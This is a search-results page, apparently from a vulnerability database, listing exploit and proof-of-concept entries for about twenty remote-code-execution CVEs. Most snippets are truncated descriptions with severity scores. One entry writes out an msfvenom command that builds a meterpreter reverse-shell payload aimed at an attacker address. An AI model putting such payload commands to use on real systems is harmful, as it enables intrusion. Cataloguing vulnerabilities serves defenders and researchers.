Lucene search
+L

516233 matches found

Kitploit
Kitploit
added 2026/08/31 2:52 p.m.4 views

CVE-2022-24500

Exploit RCE CVE-2022-24500 Vulnerabilidad de ejecución remota de código en Windows SMB Vulnerabilidad: Windows 7 - Windows 2022 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-24500 paso 1 root@kitploit: msfvenom -p windows/meterpreter/reversetcp LHOST=192.10.22.105 LPORT=4444 -f r...

8.8CVSS7.4AI score0.38049EPSS
SaveExploits2
Kitploit
Kitploit
added 2026/08/31 2:52 p.m.3 views

CVE-2023-6553-PoC

CVE-2023-6553 PoC LFI to RCE Unauthenticated Remote Code Execution in Backup Migration WordPress Plugin. Run root@kitploit: $ python exploit.py The following PHP script is executed. root@kitploit: out.txt; ? References Critical Unauthenticated Remote Code Execution Found in Backup Migration Plugi...

9.8CVSS7.2AI score0.97846EPSS
SaveExploits16References1
Kitploit
Kitploit
added 2026/08/31 2:52 p.m.6 views

CVE-2021-22204

CVE-2021-22204 Exploit para CVE-2021-22204 ExifTool - Ejecución de código arbitrario Descripción del Exploit Usa este exploit para generar un payload de imagen JPEG que puede ser utilizado con una versión vulnerable de ExifTool para ejecución de código. Se puede proporcionar un comando...

7.8CVSS7.1AI score0.99981EPSS
SaveExploits38
Kitploit
Kitploit
added 2026/08/31 2:47 p.m.4 views

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server

-CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server This vulnerability allows an unauthenticated attacker to remotely execute arbitrary code on a vulnerable Confluence server. The vulnerability exists due to an improper validation of user-supplied input in the Confluence REST API. This allow...

8.8CVSS7.4AI score0.88267EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/08/31 2:47 p.m.4 views

CVE-2021-33026

CVE-2021-33026 Serialización Pickle para Ejecución Remota de Código - Exploit PoC de Envenenamiento de Memcached ¿Qué es CVE-2021-3306? "La extensión Flask-Caching hasta la versión 1.10.1 para Flask utiliza Pickle para la serialización, lo que puede provocar una ejecución remota de código o una...

9.8CVSS7.8AI score0.07007EPSS
SaveExploits4
Kitploit
Kitploit
added 2026/08/31 2:47 p.m.6 views

CVE-2019-8561

CVE-2019-8561 Exploit de prueba de concepto para CVE-2019-8561 descubierto por Jaron Bradley @jbradley89 Corregido en macOS 10.14.4. Este script explota un bug TOCTOU en installer que permite la ejecución de código como root. Vea la charla de Jaron en Objective By the Sea v2 "Bad Things in Small...

7.8CVSS7.4AI score0.06578EPSS
SaveExploits1References1
Kitploit
Kitploit
added 2026/08/31 2:46 p.m.6 views

CVE-2025-3776

CVE-2025-3776 - Remote Code Execution in "Verification SMS with TargetSMS" Plugin = 1.5 Plugin Information Plugin Name: Verification SMS with TargetSMS Vulnerable Versions: = 1.5 CVE ID: CVE-2025-3776 Type: Remote Code Execution RCE OWASP Classification: A1: Injection CVSS Severity: 10.0 Critical...

8.3CVSS7.3AI score0.00863EPSS
SaveExploits1
EUVD
EUVD
added 2026/08/31 2:46 p.m.6 views

EUVD-2026-68577

ProfilePress wp-user-avatar WordPress plugin before 4.17.2 contains an unauthenticated remote code execution vulnerability that allows unauthenticated attackers to install and activate arbitrary plugins by brute-forcing a weak 32-bit connect token via the ppressconnectprocess AJAX handler...

9.2CVSS6.4AI score0.00539EPSS
SaveExploits0References3
Kitploit
Kitploit
added 2026/08/31 2:46 p.m.4 views

CVE-2024-11393

CVE-2024-11393 Hugging Face Transformers MaskFormer Model Deserialization of Untrusted Data Remote Code Execution Vulnerability High-level overview and effects of the vulnerability: The vulnerability allows an attacker to execute arbitrary code on the host machine by supplying a malicious...

8.8CVSS8AI score0.03074EPSS
SaveExploits1References1
Kitploit
Kitploit
added 2026/08/31 2:45 p.m.3 views

CVE-2021-41773_CVE-2021-42013_Exploits

Exploiting CVE-2021-41773 and CVE-2021-42013 Overview This repository focuses on exploiting two vulnerabilities in Apache HTTPD: CVE-2021-41773 and CVE-2021-42013. These CVEs represent path traversal vulnerabilities that can potentially lead to file mapping and remote code execution on Apache HTT...

9.8CVSS7.7AI score0.99992EPSS
SaveExploits190
Kitploit
Kitploit
added 2026/08/31 2:45 p.m.4 views

CVE-2020-0688

CVE-2020-0688 Microsoft Exchange Server Fixed Cryptographic Key Remote Code Execution RCE Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same validationKey and decryptionKey values in web.config. Thus, an authenticate...

9CVSS7.6AI score0.99965EPSS
SaveExploits29References1
Kitploit
Kitploit
added 2026/08/31 2:44 p.m.5 views

ClearML-CVE-2024-24590-RCE

Clearml-CVE-2024-24590 CVE-2024-24590 is a vulnerability that can be exploited when there is improper deserialization on the server side, in this case, Clearml. When an attacker creates a malicious Pickle file, they can execute arbitrary code on the victim who deserializes the Pickle file, which...

8.8CVSS7.6AI score0.02473EPSS
SaveExploits9
Kitploit
Kitploit
added 2026/08/31 2:43 p.m.4 views

CVE-2011-2523-poc

CVE-2011-2523-poc Este es un script de python3 para explotar el CVE-2011-2523, la Ejecución de Comandos por Backdoor en VSFTPD 2.3.4, usando los módulos socket y telnetlib. Requisitos root@kitploit: sudo python3 -m pip install pwntools Instalación root@kitploit: git clone...

10CVSS7.1AI score0.96184EPSS
SaveExploits45
Kitploit
Kitploit
added 2026/08/31 2:42 p.m.3 views

CVE-2024-9441

CVE-2024-9441 Description of the Vulnerability: This code exploits a Remote Code Execution RCE vulnerability that occurs due to improper input sanitization in a PHP-based web application. The specific weakness is in the "forgot password" functionality index.php?c=user&m=forgotpassword, where user...

9.8CVSS6.3AI score0.53472EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/08/31 2:42 p.m.4 views

CVE-2020-26217

Descripción XStream puede ser usado para Ejecución Remota de Código Influencia Xstream com.thoughtworks.xstream xstream 1.4.13 Cómo usar root@kitploit: 0 text/plain 0 -1 1 cmd/s...

9.3CVSS6.7AI score0.85001EPSS
SaveExploits7
Kitploit
Kitploit
added 2026/08/31 2:42 p.m.3 views

CVE-2020-10148

Usage & Disclaimer This script is a batch detection script for the SolarWinds Orion API remote code execution vulnerability CVE-2020-10148. Usage: Python CVE-2020-10148.py urls.txt Each URL in urls.txt is on a separate line, and the vulnerable addresses are output to vul.txt. Affected versions:...

9.8CVSS7.8AI score0.9198EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/08/31 2:42 p.m.4 views

CVE-2022-21587-Oracle-EBS-

Prerequirement for this exploit to run: python3 including module requests, os, sys, slipit uuencode Before you run, make sure to use for only on ethical duties if the exploit Fail to run: Make sure you already install the pre req module install requests pip3 install requests Install slipit, git...

9.8CVSS7.4AI score0.98342EPSS
SaveExploits7References1
Kitploit
Kitploit
added 2026/08/31 2:42 p.m.3 views

CVE-2025-22968

CVE-2025-22968 Vulnerabilidad de acceso no autenticado en D-Link DWR-M972V versión de software 1.05SSG Descripción El acceso no autenticado en la configuración predeterminada del D-Link DWR-M972V versión de software 1.05SSG permite que un atacante anónimo acceda al router y suba scripts malicioso...

9.8CVSS7.3AI score0.02497EPSS
SaveExploits1
Kitploit
Kitploit
added 2026/08/31 2:40 p.m.1 views

React2Shell-CVE-2025-55182

React2Shell-RCE-CVE-2025-55182- React2Shell | CVE-2025-55182 - React Server Components RCE...

10CVSS7AI score0.99802EPSS
SaveExploits388
Kitploit
Kitploit
added 2026/08/31 2:40 p.m.4 views

CVE-2022-36804

CVE-2022-36804 PoC This repo contains a simple proof of concept exploit for the recent BitBucket remote code execution vulnerability CVE-2022-36804. Exploitation of this vulnerability requires access to a repository on the target instance, if you don't have creds, the target will need to have...

8.8CVSS7.9AI score0.99077EPSS
SaveExploits25References1
Rows per page
Query Builder